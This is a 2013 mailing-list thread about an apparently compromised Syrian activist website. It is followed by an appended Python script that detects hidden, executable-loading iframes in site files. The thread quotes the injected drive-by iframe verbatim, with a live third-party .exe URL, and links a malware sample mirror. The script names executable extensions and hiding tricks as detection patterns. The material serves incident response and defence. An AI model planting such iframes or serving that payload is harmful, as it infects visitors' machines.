[liberationtech] Syrian-martyrs.com website probably compromised by virus

KheOps kheops at ceops.eu
Tue Jan 29 14:40:36 PST 2013


Hey,

On 29/01/2013 23:34, SiNA Rabbani wrote:
> This is the malware:
>> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/

Yes, saw that too.

However, I can't find any precise description of its behaviour, like
what it does, whether it opens any port, sends data to a C&C, or whatever.

I have downloaded it there:
https://resources.telecomix.ceops.eu/material/malwares/

All the best,

> --SiNA
>
> SiNA Rabbani:
>> holy shit:
>>
>> <iframe name="I1" width="10" height="10"
>> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
>> border="0" frameborder="0">
>>
>> :/ if you are running Windows don't even go there!!!
>>
>> Andrew Lewis:
>>> I can get to this in 6 hours or so, maybe someone is willing to
>>> jump on this before then?
>>>
>>> -Andrew
>>>
>>> On Jan 30, 2013, at 11:06 AM, KheOps <kheops at ceops.eu> wrote:
>>>
>>>> Dear Libtech,
>>>>
>>>> We just saw that the website http://www.syrian-martyrs.com
>>>> is probably compromised. Every page of the website contains an
>>>> iFrame which links to a .exe file which is detected as a virus
>>>> by antivirus software:
>>>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
>>>>
>>>> The fact that the HTML code is present at the bottom of each page makes
>>>> me think that the "index.php" page has been changed in a way
>>>> that makes that iFrame appear on every page of the website,
>>>> after the dynamic content.
>>>>
>>>> It also probably means that the attackers have some kind of
>>>> access to the server. My guess would be going to a PHP shell,
>>>> but I'm no expert in this.
>>>>
>>>> Any help, clue, investigation, would be very welcome :)
>>>>
>>>> Thank you, KheOps
>>>>
>>>> -- Unsubscribe, change to digest, or change password at:
>>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech
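Added example, not part of the thread and not code from any of its participants: a small Python script that flags hidden iframes of the kind quoted above (tiny dimensions, display:none, or a src pointing at an executable) and maps them back to the file that carries the markup. When the same iframe shows up after the dynamic content on every page, the injected string usually lives in one shared file such as index.php or a footer template, which is the first thing to check for the hypothesis raised in the original message. The sample page, the file tree, the hostnames and the list of executable extensions are all constructed assumptions for the example.

```python
"""Hidden-iframe detection for a site suspected of drive-by injection.

Added example, not code from the original post. Sample markup, paths and
hostnames are constructed; EXEC_EXTENSIONS is an assumption about droppers.
"""
import os
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: file types an injected iframe would point at to drop malware.
EXEC_EXTENSIONS = (".exe", ".scr", ".pif", ".com", ".bat", ".msi")


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _small(value, limit=20):
    """True if a width/height attribute is a small pixel value (effectively invisible)."""
    try:
        return int(value.strip().lower().rstrip("px")) <= limit
    except ValueError:
        return False


def find_suspicious_iframes(html, site_host=None):
    """Return [(src, reasons)] for iframes that look like drive-by injections.

    An iframe is flagged when its src is an executable or when it is hidden
    (tiny dimensions or display:none). A third-party host is only added as
    corroborating detail, so legitimate embeds such as video players pass.
    """
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        parsed = urlparse(src)
        reasons = []
        if parsed.path.lower().endswith(EXEC_EXTENSIONS):
            reasons.append("src is an executable")
        if _small(attrs.get("width", "")) and _small(attrs.get("height", "")):
            reasons.append("tiny dimensions")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via style")
        if reasons and site_host and parsed.hostname and parsed.hostname != site_host:
            reasons.append("third-party host " + parsed.hostname)
        if reasons:
            findings.append((src, reasons))
    return findings


def scan_files(files, site_host=None):
    """files: iterable of (path, content). Return {path: findings} for hits.

    Locating the one file that carries the markup (index.php, a footer
    template) is what tells you what the attacker actually changed.
    """
    hits = {}
    for path, content in files:
        found = find_suspicious_iframes(content, site_host)
        if found:
            hits[path] = found
    return hits


def scan_webroot(root, site_host=None, exts=(".php", ".html", ".htm", ".tpl", ".js")):
    """Walk a webroot on disk and feed the matching files to scan_files()."""
    def read_all():
        for dirpath, _, names in os.walk(root):
            for name in names:
                if name.lower().endswith(exts):
                    full = os.path.join(dirpath, name)
                    try:
                        with open(full, encoding="utf-8", errors="replace") as fh:
                            yield full, fh.read()
                    except OSError:
                        continue
    return scan_files(read_all(), site_host)


# Constructed sample: a page whose injected iframe sits after the closing html tag.
SAMPLE_PAGE = """<html><body>
<h1>News</h1><p>Article text.</p>
<iframe src="https://www.youtube.com/embed/xyz" width="560" height="315"></iframe>
</body></html>
<iframe name="I1" width="10" height="10" src="http://example.invalid/downloads/ActiveX.exe" border="0" frameborder="0">
"""

# Constructed file tree: only the shared footer carries the injection.
SAMPLE_TREE = [
    ("/var/www/about.php", "<?php include 'footer.php'; ?><p>About</p>"),
    ("/var/www/footer.php", "</div></body></html>" + SAMPLE_PAGE.split("</html>")[1]),
]

if __name__ == "__main__":
    for src, why in find_suspicious_iframes(SAMPLE_PAGE, site_host="www.example.org"):
        print(src, "->", ", ".join(why))
    for path, found in scan_files(SAMPLE_TREE, site_host="www.example.org").items():
        print(path, "carries", len(found), "suspicious iframe(s)")
    # On a real box: scan_webroot("/var/www", site_host="www.example.org")
```

Run it against a copy of the webroot rather than the live tree, and treat the file it points at as evidence: compare its mtime and content against a backup or the CMS release before cleaning it, since the thread's hypothesis (write access on the server, possibly a PHP shell) means removing the iframe alone does not close the hole.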